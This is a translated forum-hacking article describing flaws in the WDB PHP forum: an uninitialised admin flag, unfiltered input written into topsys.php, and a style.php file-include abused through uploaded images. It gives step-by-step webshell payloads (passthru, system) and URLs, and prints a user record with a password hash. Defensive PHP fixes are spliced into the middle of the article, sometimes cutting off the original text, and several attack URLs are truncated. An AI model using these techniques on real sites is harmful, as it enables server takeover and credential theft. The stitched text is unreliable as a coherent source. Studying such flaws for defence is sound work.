==================================================================
This article is dedicated to my friend Bytes,
with the wish that he and his girlfriend Lu Zi find a lifelong true love and grow old together.
==================================================================
Preface:
When I talk about web security with network administrators, many of them tell me that web security means SQL injection. "Isn't it just sticking a SQL statement behind a variable? I can do that too." That is most of what people know about web security. Is web security only SQL injection? Of course not! SQL injection is just the tip of the iceberg. To those who think injection is all there is to web security: open your eyes and let real actions slap you in the face!
Description:
Recently I have been reading the WDB forum. The forum is nice and elegant, and similar to LB5, but its security is far from flattering. Saying that on average one file in five has a vulnerability would be no exaggeration. Although the author seems to have taken some measures deliberately, the filtering is not strict, so a malicious (or not-so-malicious) user can write in his own code, execute his own statements, and control the entire system.
I. topsys.php global variables are not initialized, giving control of the entire forum
1. Vulnerability Analysis
topsys.php is the file administrators use to centrally manage the pinned ("top") posts of the forum: pinning, clearing and deleting them. It is a small file, yet because the programmer did not initialize some variables, it can be used to control the entire forum and even the entire system.
Let's first look at how the restriction is bypassed. Part of the code is as follows:
========= Codz begin ================
13 if ($login_status == 1 && ($username == $admin_name || ($manager && in_array($username, $manager)))) { $announceadmin = 1; }
14 // ---- give the added administrators the right to manage! ----------
15 if (file_exists("datafile/admin_user.php")) {
16     include("datafile/admin_user.php");
17     if ($admin_user && in_array($username, $admin_user)) {
18         $announceadmin = 1;
19     }
20 }
21 // ---- give the added administrators the right to manage! ----------
22 $musia = 0;
23 if ($announceadmin == 1) $musia = 1;
========= Codz endz ==================
The check on line 13 determines whether the user has administrator permission; if so, it sets $announceadmin to 1. After that the programmer did not forget to initialize $musia, and then tests whether $announceadmin is 1; if it is, $musia is set to 1 as well. Let's skip this for now and come back to it later.
Now look at this code:
========= Codz begin ================
150 if ($job == "write") {
151     if ($announceadmin != 1) { require("header.php");
152         echo "Sorry, you have not logged in or your identity is incorrect. Please <a href='javascript:history.back(1);'>return to check</a>";
153         require("footer.php");
154         exit; }
// the pinning operation follows ......
========= Codz endz ==================
How does the program verify administrator identity? The programmer relies on a single value: here he checks whether $announceadmin is 1, and if it is not, reports that the identity is incorrect (not an administrator). Now go back to the seemingly rigorous check above. What do you see? The value used to decide whether the user has administrator permission is never initialized. If we simply submit $announceadmin=1 ourselves, we can publish and delete pinned posts with administrator privilege. Let's try it:
http://bbs.target.com/topsys.php?announceadmin=1
What we see is different from before: the administrator management module has appeared. Pick a post in a sub-forum and submit a URL like the following:
http://bbs.target.com/topsys.php?announcea...tent=hello, this is Jambalaya&title=wdbread.php?forumid=1&filename=f_27
This pins post f_27 of the first forum with the text "hello, this is Jambalaya". Press Enter. Haha, it succeeded. The same method deletes and clears pinned posts across the whole system; analysing those here would be a waste of time. After a while I thought: how can we control the entire website? HOHO ~~ The real attack starts here... Come with me ~~~~~
So far we can only pin, clear and delete posts with the administrator's identity, nothing more. But we have bypassed the administrator's permission check, and after the bypass things are different. Don't believe it? Haha, wait and see...
Look at the following code:
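For comparison, here is how the topsys.php authorization can be written so that the flag cannot be supplied from the request. This is an added example, not WDB's code; it assumes $login_status, $username, $admin_name, $manager and $admin_user come from the session and configuration as in the original, and that the injected value reaches the script through register_globals, which is what the original depends on.

```php
<?php
// Added example, not code from WDB. The decisive difference from the original
// topsys.php is that $announceadmin starts at 0 and is computed only from
// server-side data, so a forged ?announceadmin=1 in the request has no effect.
function is_announce_admin($login_status, $username, $admin_name, $manager, $admin_user)
{
    $announceadmin = 0;   // the original never initialised this variable

    // Comparison (==) and logical operators (&&, ||), not assignment or bitwise ops.
    if ($login_status == 1
        && ($username == $admin_name
            || (is_array($manager) && in_array($username, $manager, true)))) {
        $announceadmin = 1;
    }
    // Administrators added through datafile/admin_user.php ($admin_user)
    if (is_array($admin_user) && in_array($username, $admin_user, true)) {
        $announceadmin = 1;
    }
    return $announceadmin == 1;
}

// Constructed session/config values standing in for what WDB loads.
$login_status = 1;
$username     = 'Jambalaya';            // an ordinary registered user
$admin_name   = 'admin';
$manager      = array('moderator1');
$admin_user   = array('helper');

// Constructed forged request: the same trick the text uses.
$_GET['job'] = 'write';
$_GET['announceadmin'] = '1';

// The request value is simply never consulted.
if ($_GET['job'] == 'write') {
    if (!is_announce_admin($login_status, $username, $admin_name, $manager, $admin_user)) {
        echo "Sorry, you have not logged in or your identity is incorrect.\n"; // Jambalaya lands here
        exit;
    }
    echo "pinning allowed\n";   // only reached for the admin, a manager or an added admin
}
?>
```

Turning register_globals off (or reading $_GET/$_POST explicitly) removes the injection channel altogether; initialising the flag removes the code's dependence on that setting.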
========= Codz begin ================
165 if (file_exists("datafile/topsys.php")) $msg = file("datafile/topsys.php");
166 else $msg[0] = "";
167
168 $content = stripslashes(safe_convert($content));
169 $title = stripslashes(safe_convert($title));
170 $title = "" . $title;
171 if ($filename) $title = $title . "&filename=" . $filename;   // for wdbread.php
172 $new = "$user|$title|$timestamp|$content|$member\n";
173
174 $oldcount = count($msg);
175 if ($oldcount > $msgg_max) {
176     for ($i = $msgg_max; $i < $oldcount; $i++) unset($msg[$i]);   // drop entries beyond the limit
177 }
178
179 $old = implode("", $msg);
180 writetofile("datafile/topsys.php", $new . $old);
========= Codz endz ==================
This is what runs once we hold administrator permission. First it checks whether datafile/topsys.php, the file that records pinned posts, exists. Then what does it write? From writetofile("datafile/topsys.php", $new . $old) we see that $new . $old is written into topsys.php, where $new = "$user|$title|$timestamp|$content|$member\n". $user and $timestamp are fixed; $title and $content look usable, but the safe_convert function looks a little scary. For a security person, carefulness and patience are indispensable; otherwise so-called good luck will not come looking for you. So as not to miss any detail, let's look at this function in global.php and see whether its filtering is loose anywhere:
========= Codz begin ================
837 function safe_convert($d) {
838     $d = str_replace("\t", "", $d);
839     $d = str_replace("<", "&lt;", $d);     // HTML-escape angle brackets
840     $d = str_replace(">", "&gt;", $d);
841     $d = str_replace("\r", "<br>", $d);
842     $d = str_replace("\n", "", $d);
843     $d = str_replace("|", "│", $d);        // "|" is the record separator of topsys.php
844     $d = str_replace("", "", $d);          // search/replace strings lost in extraction
845     return $d;
846 }
========= Codz endz ==================
After reading it I broke into a cold sweat: the filtering is very strict, and several important characters are basically wiped out. It seems unlikely that we can sneak anything past it. Go back and check the other variables. What remains is $member; scanning the context shows that we can control it, so we can use this value to write our own code into the file.
Hello! Wait! Wait! We could start writing the attack method here, but let's pause. Look closely at the code and at my analysis. There is something we have ignored. Have you noticed it? No? Check again.
Suppose $member were also filtered. What then? Look closer: $title is in fact not fully filtered. The programmer made a serious logic error here. Filtering $title at the beginning is correct, but he then assigned a value to $title again after filtering, which is wrong. Look at this statement: if ($filename) $title = $title . "&filename=" . $filename; After strictly filtering the title, he appends a new value to it, and that new value is not filtered. We can use this new value to write our own code. It is as if a defender holding a solid shield dug a large hole in the middle of it and then said to the archer, "Okay, you can shoot now."
We can see from this that failing to pay attention to any detail will lead to the collapse of your defense.
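To show the ordering problem in code: below, added here and not part of WDB, the safe_convert filter from global.php is applied the way topsys.php does it and then the way it should be done, on a constructed $filename carrying a record separator and PHP tags. The f_<digits> pattern is my assumption about valid WDB post file names, based on the names f_27 and f_13 in this article.

```php
<?php
// Added example, not WDB code. safe_convert is reproduced from the page
// (tabs, angle brackets, line breaks and the "|" record separator neutralised).
function safe_convert($d) {
    $d = str_replace("\t", "", $d);
    $d = str_replace("<", "&lt;", $d);
    $d = str_replace(">", "&gt;", $d);
    $d = str_replace("\r", "<br>", $d);
    $d = str_replace("\n", "", $d);
    $d = str_replace("|", "│", $d);   // full-width bar: cannot split a record
    return $d;
}

// The original order: $title is filtered, then $filename is appended raw.
function build_title_original($title, $filename) {
    $title = stripslashes(safe_convert($title));
    if ($filename) $title = $title . "&filename=" . $filename;
    return $title;
}

// Fixed: the appended value is filtered too, and restricted to the post-file
// form f_<digits> (assumed from the names f_27 and f_13 in the article).
function build_title_fixed($title, $filename) {
    $title = stripslashes(safe_convert($title));
    if ($filename && preg_match('/^f_\d+$/', $filename)) {
        $title = $title . "&filename=" . safe_convert($filename);
    }
    return $title;
}

// Constructed hostile filename: an extra "|" field plus PHP tags.
$filename = "f_27|<?php echo 1; ?>";
$title    = "wdbread.php?forumid=1";

$original = build_title_original($title, $filename);
$fixed    = build_title_fixed($title, $filename);

// Count the separators the record "$user|$title|$timestamp|$content|$member"
// would be split on: the original gains a field, the fixed version none.
echo "original: " . $original . "  (" . substr_count($original, "|") . " separators)\n";
echo "fixed:    " . $fixed    . "  (" . substr_count($fixed, "|") . " separators)\n";
?>
```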
2. Attack methods
The analysis is complete. As the saying goes, "a gentleman does not waste words". Come on, let's get started ~~~~
Since we can write code into the file, what should we write? After 0.001 seconds of thought I decided to write a shell, and to write everything in one go. First register a user:
Username: Jambalaya
Password: itaq.org
Then I posted a post titled "test me" with the content "I am Jambalaya and I am from www.itaq.org. Come and play when you have time." Haha, then submit the following URL:
http://bbs.target.com/topsys.php?announcea...#036;jam);?>
Then access http://bbs.target.com/topsys.php?jam=dir directly. How about that? A shell is made ~~~~
dir lists the directory, and we see that user_jkljkl is the directory where user data is saved. Submit the URL:
http://bbs.target.com/user_jkljkl/username ,?.... No rabbit? :P
This is too easily discovered, however. You can first remove the other party's pinned post and then write the shell into it.
So what can we do when the title variable is not fully filtered? Let's give it a try; after all, knowing and understanding are two different things, and understanding and applying are two different things as well. In the ITAQ security forum we have a motto from our friend SystEm32 that I like very much: "If you have never practiced it, you are not qualified to speak!"
II. style.php variables are not filtered
Next, let's look at the style.php file. The variables in this file are not filtered, so a malicious attacker can execute his own code and control the entire website.
Test environment: IIS 5.0 + Windows 2000
1. Specific Vulnerabilities
Description:
Let's look at the relevant code in style.php:
========= Codz begin ================
<?
if (empty($skin)) $skin = "crystal classic";
if (file_exists("datafile/style/" . $skin)) include("datafile/style/" . $skin);
else include("datafile/style/crystal classic");
========= Codz endz ==================
The intent of the code is to set the forum's appearance style: if the skin variable is not empty, use it as the skin, and if that file exists under datafile/style/, include it. Notice that the skin variable is never checked, so we can use "../" or "./" to jump to any directory and include any file we specify.
So how do we proceed? We know that include parses and executes PHP code from a file, even one saved as an image, so the remaining steps are much simpler. First we need to upload an image. Different WDB versions have different upload methods: some Chinese versions allow uploading avatars, some only attachments. In this Crystal forum I could only upload attachments, and only after posting a certain number of posts. After posting, I found I could upload an attachment, and the forum saved it as upload/forum1_f_23_978374564.jpg. Some friends may now want to write a PHP Trojan into the jpg and have include execute it. This does not work directly: include does execute the code in the jpg, but the included file cannot receive variables sent with GET after the question mark.
Instead we use a probe to find the directory storing the users. Write <? passthru("dir"); ?> directly into the jpg, then request http://bbs.target.com/myhome/wdb/datafile/style.php?skin=../../../upload/forum1_f_23_978374564.jpg and read the absolute path from the returned output. For example, I got F:\myhome\wdb\datafile, and along the way all the files in it. Then I uploaded another image containing <? passthru("dir f:\myhome\wdb") ?> and requested http://bbs.target.com/myhome/wdb/datafile/style.php?skin=../../../upload/forum1_f_23_978374564.jpg again. The directories and files in f:\myhome\wdb were returned, and the user directory user_jkljkl was found. Requesting the user record in the URL returns:
Jambalaya|eed8sp_400dfd4ec85dff70a170066b7|jam@itaq.org|1083116258|1084002908|2|none|998.4|
1084150077|1084150372|1068|jam|wdbread.php?forumid=1&filename=f_13|1|192.168.0.13
The password for Jambalaya is eed8gj400dfd4ec85dff70a170066b7.
Now to get a shell: write <? system($a); ?> into another file, save it as a jpg and upload it; its path is upload/forum1_f_24_978374654.jpg. What does the next uploaded file contain? <? rename("f:\\myhome\\wdb\\upload\\forum1_f_24_978374654.jpg", "jam.php") ?>, saved as upload/forum1_f_25_978374773.jpg. Then call http://192.168.0.13/myhome/wdb/datafile/style.php?skin=../../../upload/forum1_f_25_978374773.jpg directly in the URL. This executes our command, which changes the suffix to php, and then we call our statement to get a shell.
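A hardened form of the style.php skin selection, added here as an example and not WDB's code: the request value must be a bare name present in datafile/style/, and the resolved path is re-checked to be inside that directory, so "../" sequences and uploaded files cannot be reached. The directory and default skin name are taken from the page; the helper name resolve_skin is mine.

```php
<?php
// Added example, not WDB code. Replaces the unchecked
//   include("datafile/style/" . $skin);
// with a whitelist built from the style directory itself.
define('STYLE_DIR',    __DIR__ . '/datafile/style');
define('DEFAULT_SKIN', 'crystal classic');   // the page's default skin name

function resolve_skin($requested)
{
    // 1. A skin is a bare file name: any directory part ("../", "..\", "/")
    //    makes basename() differ from the input, so it is rejected.
    if (!is_string($requested) || $requested === '' || basename($requested) !== $requested) {
        return DEFAULT_SKIN;
    }
    // 2. Only names that are regular files directly inside STYLE_DIR qualify;
    //    glob('*') also skips dot entries such as "..".
    $allowed = array();
    foreach (glob(STYLE_DIR . '/*') as $path) {
        if (is_file($path)) $allowed[] = basename($path);
    }
    if (!in_array($requested, $allowed, true)) {
        return DEFAULT_SKIN;
    }
    // 3. Re-check the canonical path: it must still start with STYLE_DIR
    //    (catches symlinks inside the style directory pointing elsewhere).
    $real = realpath(STYLE_DIR . '/' . $requested);
    $base = realpath(STYLE_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return DEFAULT_SKIN;
    }
    return $requested;
}

// Request handling: the traversal string from the text falls back to the default.
$skin = resolve_skin(isset($_GET['skin']) ? $_GET['skin'] : '');
include(STYLE_DIR . '/' . $skin);
?>
```

Because the whitelist comes from the directory listing, a file uploaded to upload/ cannot be selected however it is named, which closes the jpg-include path used in the text; keeping uploads outside any include path and never executing them remains the complementary fix.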
III. Conclusion:
Now the article is written, and to wrap up, the old saying: we do not want anyone to use this to attack others.
Here I must emphasize that forum vulnerabilities concern not only the forum itself but the security of the whole system!
I discovered these vulnerabilities some time ago. At first I only discussed them in the internal section of itaq.org and did not intend to publish them. Not long ago I met a senior named lovehacker, who told me that only constant exchange brings improvement, and that those unwilling to share with others will never improve. He unselfishly shares his experience of discovering server vulnerabilities, and his spirit of sharing made a deep impression on me. I would like to thank lovehacker for his teaching here.
The text was written hastily and my skill is limited. If there are any mistakes in it, I ask the experts to correct me in person at www.itaq.org. I am very grateful.